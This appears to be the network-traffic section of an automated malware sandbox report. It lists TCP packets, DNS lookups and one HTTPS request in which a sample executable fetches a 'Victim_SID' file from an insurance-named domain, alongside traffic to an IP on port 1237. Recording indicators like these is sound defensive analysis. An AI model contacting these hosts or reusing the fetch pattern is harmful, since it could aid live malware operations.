                            Jul 27, 2024 11:37:20.936958075 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:20.937020063 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:20.937220097 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:20.937269926 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:20.937465906 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:20.937517881 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:20.937722921 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:20.937763929 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:20.937773943 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:20.937781096 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:20.937808990 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:20.937827110 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:20.938436985 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:20.938498020 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:20.938627005 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:20.938680887 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:20.939265013 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:20.939327955 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:20.939512014 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:20.939572096 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:20.940160036 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:20.940217972 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:20.940393925 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:20.940449953 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.007879019 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.007957935 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.008065939 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.008120060 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.008131027 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.008172035 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.025605917 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.025645018 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.025664091 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.025671005 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.025708914 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.025732994 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.025753975 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.025794029 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.025813103 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.025818110 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.025844097 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.025866985 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.026179075 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.026216984 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.026227951 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.026232958 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.026257992 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.026283979 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.026494980 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.026546001 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.026864052 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.026909113 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.026931047 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.026937008 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.026949883 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.026968002 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.026973009 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.026982069 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.027019024 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.027025938 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.027040958 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.027066946 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.027498960 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.027550936 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.027678013 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.027713060 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.027728081 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.027734041 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.027755976 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.027770042 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.027970076 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.028031111 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.028263092 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.028315067 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.095069885 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.095149994 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.095155954 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.095179081 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.095201969 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.095222950 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.095396042 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.095451117 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.095458031 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.095501900 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.113780975 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.113837957 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.113857031 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.113872051 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.113897085 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.113915920 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.114012003 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.114063025 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.114068031 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.114116907 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.114495039 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.114578962 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.114708900 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.114763975 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.115586042 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.115598917 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.115619898 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.115650892 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.115659952 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.115689039 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.115704060 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.115710974 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.115725994 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.115755081 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.115772009 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.115972042 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.116029024 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.116797924 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.116844893 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.116858959 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.116859913 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.116877079 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.116895914 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.116931915 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.117233992 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.117304087 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.117311001 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.117557049 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.117860079 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.117907047 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.117925882 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.117933035 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.117961884 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.117979050 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.118185997 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.118235111 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.118246078 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.118252039 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.118279934 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.118300915 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.118632078 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.118700027 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.118736982 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.118788004 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.118843079 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.118891001 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.119091034 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.119138002 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.184318066 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.184382915 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.184415102 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.184439898 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.184506893 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.184506893 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.184798002 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.184845924 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.184860945 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.184870958 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.184901953 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.184921026 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.202430964 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.202486992 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.202534914 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.202543974 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.202594042 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.203274965 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.203322887 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.203347921 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.203355074 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.203382969 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.203416109 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.203805923 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.203850985 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.203885078 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.203891993 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.203905106 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.203952074 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.204696894 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.204749107 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.204782009 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.204788923 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.204829931 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.204845905 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.205101967 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.205188036 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.205194950 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.205244064 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.205250978 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.205272913 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.205296040 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.205322027 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.208375931 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.208421946 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.208472013 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.208478928 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.208504915 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.208547115 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.272464991 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.272546053 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.272564888 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.272578001 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.272633076 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.272640944 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.273082018 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.273143053 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.273164988 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.273169994 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.273231983 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.291114092 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.291161060 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.291193962 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.291202068 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.291229963 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.291249990 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.291733027 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.291806936 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.291814089 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.291871071 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.292114019 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.292172909 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.292195082 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.292200089 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.292210102 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.292233944 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.292551041 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.292608976 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.292671919 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.292726994 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.292776108 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.292840004 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.293324947 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.293396950 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.293875933 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.293943882 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.293951035 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.293962002 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.294009924 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.294646978 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.294694901 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.294733047 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.294739008 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.294765949 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.294781923 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.295460939 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.295523882 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.295548916 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.295557022 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.295583010 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.295603991 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.361324072 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.361367941 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.361397982 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.361407042 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.361440897 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.361460924 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.361651897 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.361716032 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.361721992 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.361752033 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.361764908 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.361820936 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.362323999 CEST49711443192.168.2.9104.21.65.79
                            Jul 27, 2024 11:37:21.362340927 CEST44349711104.21.65.79192.168.2.9
                            Jul 27, 2024 11:37:21.741442919 CEST49677443192.168.2.920.189.173.11
                            Jul 27, 2024 11:37:22.381575108 CEST49712443192.168.2.934.117.59.81
                            Jul 27, 2024 11:37:22.381620884 CEST4434971234.117.59.81192.168.2.9
                            Jul 27, 2024 11:37:22.382088900 CEST49712443192.168.2.934.117.59.81
                            Jul 27, 2024 11:37:22.387310982 CEST49712443192.168.2.934.117.59.81
                            Jul 27, 2024 11:37:22.387330055 CEST4434971234.117.59.81192.168.2.9
                            Jul 27, 2024 11:37:22.862433910 CEST4434971234.117.59.81192.168.2.9
                            Jul 27, 2024 11:37:22.862629890 CEST49712443192.168.2.934.117.59.81
                            Jul 27, 2024 11:37:22.864921093 CEST49712443192.168.2.934.117.59.81
                            Jul 27, 2024 11:37:22.864929914 CEST4434971234.117.59.81192.168.2.9
                            Jul 27, 2024 11:37:22.865164995 CEST4434971234.117.59.81192.168.2.9
                            Jul 27, 2024 11:37:22.913286924 CEST49712443192.168.2.934.117.59.81
                            Jul 27, 2024 11:37:22.985685110 CEST49712443192.168.2.934.117.59.81
                            Jul 27, 2024 11:37:23.028501034 CEST4434971234.117.59.81192.168.2.9
                            Jul 27, 2024 11:37:23.126501083 CEST4434971234.117.59.81192.168.2.9
                            Jul 27, 2024 11:37:23.126580954 CEST4434971234.117.59.81192.168.2.9
                            Jul 27, 2024 11:37:23.126982927 CEST49712443192.168.2.934.117.59.81
                            Jul 27, 2024 11:37:23.134958029 CEST49712443192.168.2.934.117.59.81
                            Jul 27, 2024 11:37:23.624733925 CEST497131237192.168.2.945.94.31.188
                            Jul 27, 2024 11:37:23.629785061 CEST12374971345.94.31.188192.168.2.9
                            Jul 27, 2024 11:37:23.630028009 CEST497131237192.168.2.945.94.31.188
                            Jul 27, 2024 11:37:23.634955883 CEST497131237192.168.2.945.94.31.188
                            Jul 27, 2024 11:37:23.640016079 CEST12374971345.94.31.188192.168.2.9
                            Jul 27, 2024 11:37:23.640140057 CEST497131237192.168.2.945.94.31.188
                            Jul 27, 2024 11:37:23.645078897 CEST12374971345.94.31.188192.168.2.9
                            Jul 27, 2024 11:37:27.791723013 CEST497131237192.168.2.945.94.31.188
                            Jul 27, 2024 11:37:27.792152882 CEST497131237192.168.2.945.94.31.188
                            Jul 27, 2024 11:37:27.796665907 CEST12374971345.94.31.188192.168.2.9
                            Jul 27, 2024 11:37:27.840562105 CEST12374971345.94.31.188192.168.2.9
                            Jul 27, 2024 11:37:30.622243881 CEST49704443192.168.2.923.206.229.209
                            Jul 27, 2024 11:37:30.627443075 CEST4434970423.206.229.209192.168.2.9
                            Jul 27, 2024 11:37:30.779949903 CEST4434970423.206.229.209192.168.2.9
                            Jul 27, 2024 11:37:30.780024052 CEST49704443192.168.2.923.206.229.209
                            Jul 27, 2024 11:37:30.780818939 CEST4434970423.206.229.209192.168.2.9
                            Jul 27, 2024 11:37:30.780836105 CEST4434970423.206.229.209192.168.2.9
                            Jul 27, 2024 11:37:30.780925989 CEST49704443192.168.2.923.206.229.209
                            Jul 27, 2024 11:37:30.780925989 CEST49704443192.168.2.923.206.229.209
                            Jul 27, 2024 11:37:30.784181118 CEST4434970423.206.229.209192.168.2.9
                            Jul 27, 2024 11:37:30.784280062 CEST49704443192.168.2.923.206.229.209
                            Jul 27, 2024 11:37:37.589663982 CEST4434970423.206.229.209192.168.2.9
                            Jul 27, 2024 11:37:37.589752913 CEST49704443192.168.2.923.206.229.209
                            Jul 27, 2024 11:37:39.359124899 CEST12374970945.94.31.188192.168.2.9
                            Jul 27, 2024 11:37:39.359205961 CEST497091237192.168.2.945.94.31.188
                            Jul 27, 2024 11:37:45.030026913 CEST12374971345.94.31.188192.168.2.9
                            Jul 27, 2024 11:37:45.030164957 CEST497131237192.168.2.945.94.31.188
                            Jul 27, 2024 11:38:01.979331970 CEST4970580192.168.2.9199.232.214.172
                            Jul 27, 2024 11:38:01.985111952 CEST8049705199.232.214.172192.168.2.9
                            Jul 27, 2024 11:38:01.988653898 CEST4970580192.168.2.9199.232.214.172

                            UDP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Jul 27, 2024 11:37:13.061350107 CEST6006853192.168.2.91.1.1.1
                            Jul 27, 2024 11:37:13.077002048 CEST53600681.1.1.1192.168.2.9
                            Jul 27, 2024 11:37:16.127563000 CEST6215653192.168.2.91.1.1.1
                            Jul 27, 2024 11:37:16.134572029 CEST53621561.1.1.1192.168.2.9

                            DNS Queries

                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                            Jul 27, 2024 11:37:13.061350107 CEST192.168.2.91.1.1.10x150dStandard query (0)investdirectinsurance.comA (IP address)IN (0x0001)false
                            Jul 27, 2024 11:37:16.127563000 CEST192.168.2.91.1.1.10x641dStandard query (0)ipinfo.ioA (IP address)IN (0x0001)false

                            DNS Answers

                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            Jul 27, 2024 11:37:13.077002048 CEST1.1.1.1192.168.2.90x150dNo error (0)investdirectinsurance.com104.21.65.79A (IP address)IN (0x0001)false
                            Jul 27, 2024 11:37:13.077002048 CEST1.1.1.1192.168.2.90x150dNo error (0)investdirectinsurance.com172.67.189.102A (IP address)IN (0x0001)false
                            Jul 27, 2024 11:37:16.134572029 CEST1.1.1.1192.168.2.90x641dNo error (0)ipinfo.io34.117.59.81A (IP address)IN (0x0001)false
                            Jul 27, 2024 11:37:30.816615105 CEST1.1.1.1192.168.2.90xa17dNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                            Jul 27, 2024 11:37:30.816615105 CEST1.1.1.1192.168.2.90xa17dNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                            Jul 27, 2024 11:37:43.360903025 CEST1.1.1.1192.168.2.90xe49dNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                            Jul 27, 2024 11:37:43.360903025 CEST1.1.1.1192.168.2.90xe49dNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false

                            HTTP Request Dependency Graph

                            • investdirectinsurance.com
                            • ipinfo.io

                            HTTPS Connections

                            TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                            Jul 27, 2024 11:37:30.780836105 CEST23.206.229.209443192.168.2.949704CN=r.bing.com, O=Microsoft Corporation, L=Redmond, ST=WA, C=US CN=Microsoft Azure ECC TLS Issuing CA 04, O=Microsoft Corporation, C=USCN=Microsoft Azure ECC TLS Issuing CA 04, O=Microsoft Corporation, C=US CN=DigiCert Global Root G3, OU=www.digicert.com, O=DigiCert Inc, C=USMon Jun 24 18:16:15 CEST 2024 Thu Jun 08 02:00:00 CEST 2023Thu Jun 19 18:16:15 CEST 2025 Wed Aug 26 01:59:59 CEST 2026771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-16-23-65281,29-23-24,028a2c9bd18a11de089ef85a160da29e4
                            CN=Microsoft Azure ECC TLS Issuing CA 04, O=Microsoft Corporation, C=USCN=DigiCert Global Root G3, OU=www.digicert.com, O=DigiCert Inc, C=USThu Jun 08 02:00:00 CEST 2023Wed Aug 26 01:59:59 CEST 2026

                            HTTPS Proxied Packets

                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.949706104.21.65.794437560C:\Users\user\Desktop\Mu7iyblZk8.exe
                            TimestampBytes transferredDirectionData
                            2024-07-27 09:37:13 UTC136OUTGET /assuence/litesolidCha/Victim_SID.bd HTTP/1.1
                            User-Agent: Mozilla/5.0
